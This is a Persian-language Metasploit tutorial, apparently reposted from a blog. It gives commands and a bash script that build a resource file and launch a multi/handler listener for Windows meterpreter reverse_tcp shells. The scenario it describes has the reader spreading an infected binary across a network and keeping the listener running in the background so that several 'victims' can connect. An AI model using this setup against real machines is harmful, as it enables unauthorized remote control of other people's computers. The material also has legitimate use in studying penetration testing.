منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : Writing Meterpreter Scripts

سلام دوستان . قسمت سوم آموزش های متااسپلویت را در پیش رو داریم . در این قسمت در مورد نوشتن اسکریپت های meterpreter صحبت خواهیم کرد و در آخر با استفاده از bash یک اسکریپت کوچیک آماده می کنیم . یکی دیگر از قابلیت های متااسپلویت این است که می توان اسکریپتی تهیه کرد و تمامی مراحل و کار هایی را که در ذهن داریم را به صورت خودکار پشت سر هم انجام دهیم .

یعنی دقیقا دستور هایی که قرار است در کنسول متااسپلویت زده شود را در یک فایل می نویسیم و سپس آن را اجرا می کنیم . نتیجه این خواهد شد که دستورات و کار هایی که در ذهن داشتیم پشت سر هم اجرا می شود و دیگر نیاز به تایپ مجدد نیست .

لازم به ذکر است که با این روش می توان اسکریپت های زیادی را بوجود آورد .

برای مثال فرض کنید که فایلی باینری و آلوده ساخته ایم و ( با هر روشی ) آن را در سطح شبکه پخش کرده ایم . حال لازم است سیستم خودمون رو روی حالت listening قرار دهیم و منتظر متصل شدن قربانی ها باشیم . با استفاده از اسکریپت نویسی کار خود را به شکل زیر پیش می بریم :

1. ابتدا یک فایل با نام meterpreter.rc در دایرکتوری جاری ایجاد می کنیم :

root@kali:~# touch meterpreter.rc

2. سپس exploit مورد نظر خودمون رو داخل این فایل اضافه می کنیم :

root@kali:~# echo use exploit/multi/handler >> meterpreter.rc

3. و همین طور payload ای که فایل باینری را با آن ایجاد کردیم را اضافه می کنیم :

root@kali:~# echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc

4. در مرحله ی بعد باید آدرس آی پی سیستم خودمون رو اضافه کنیم :

root@kali:~# echo set LHOST 192.168.1.184 >> meterpreter.rc

5. و برای این که session ایجاد شده از بین نرود به صورت زیر عمل خواهیم کرد :

root@kali:~# echo set ExitOnSession false >> meterpreter.rc

6. و در نهایت مراحل را با دو سویچ j- و z- تکمیل می کنیم :

root@kali:~# echo exploit -j -z >> meterpreter.rc

 

در آخر برای اجرای این اسکریپت کافیست آن را به شکل زیر اجرا کنیم :

root@kali:~# msfconsole -r meterpreter.rc

 

نکته : سویچ j و z باعث شد تا session ایجاد شده بین قربانی و مهاجم در background باز شود تا دیگر قربانی ها هم بتوانند متصل شوند .

در آخر برای مشاهده ی session های ایجاد شده کافیست از دستور زیر استفاده کنیم :

msf exploit(handler) > sessions -l

 

می توان از این هم جلوتر رفت و با استفاده از bash یک اسکریپت کوچیک آماده کرد که هر بار لازم نباشد مرحله ی شماره ی 4 را دستی ویرایش و set کنیم . یعنی اسکریپتی آماده کنیم پس اجرا آدرس سیستم را از ما سوال کند !

برای این منظور به شکل زیر عمل می کنیم :

###########################################################################
#
# http://OSLearn.ir
# E2MA3N
#
###########################################################################
#! /bin/bash
###########################################################################
#

echo use exploit/multi/handler > /tmp/meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> /tmp/meterpreter.rc
echo -n "[*] Enter attacker IP : " ; read lhost
echo set LHOST $lhost >> /tmp/meterpreter.rc
echo set ExitOnSession false >> /tmp/meterpreter.rc
echo exploit -j -z >> /tmp/meterpreter.rc

sleep 0.5
echo -e "[*]"
sleep 2
echo -e "[*] Create meterpreter.rc"
sleep 2
echo -e "[*] Run metasploit"
sleep 1

msfconsole -r /tmp/meterpreter.rc
#
###########################################################################

حال همانند دیگر اسکریپت ها پرمیشن اجرا به این اسکریپت می دهیم :

root@kali:~# chmod +x MSF.sh

و در نهایت آن را به شکل زیر اجرا می کنیم :

root@kali:~# ./MSF.sh

OSLearn.ir_001

 

موفق و موید باشید

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N



برچسب ها : ,

به سیاره لینوکس امتیاز دهید

به اين صفحه امتياز دهيد